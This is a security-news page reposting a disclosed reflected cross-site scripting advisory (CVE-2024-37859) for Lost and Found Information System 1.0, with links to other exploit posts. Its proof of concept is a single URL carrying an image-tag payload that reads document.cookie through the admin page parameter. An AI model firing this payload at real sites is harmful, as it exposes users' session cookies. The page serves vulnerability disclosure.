Home Tools Exploits & CVE's Lost And Found Information System 1.0 Cross Site Scripting

Lost And Found Information System 1.0 Cross Site Scripting

June 17, 2024

Authored by Amit Roy

Lost and Found Information System version 1.0 suffers from a reflective cross site scripting vulnerability.

advisories | CVE-2024-37859

# Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System 
# Exploit Author: Amit Roy (Rezur / AR0x7)
# Date: June 07, 2024
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
#   Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users
# CVE : CVE-2024-37859

1) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>

Lost And Found Information System 1.0 Cross Site Scripting

LEAVE A REPLY Cancel reply

Follow us on Instagram @thecyberpost

EDITOR PICKS

Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution

Telerik Report Server Authentication Bypass / Remote Code Execution

PHP Remote Code Execution

POPULAR POSTS

Oracle Database Password Hash Unauthorized Access

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

POPULAR CATEGORY

CSE Bookstore 1.0 SQL Injection

Moxa Command Injection / Cross Site Scripting / Vulnerable Software

Backdoor.Win32.Celine Missing Authentication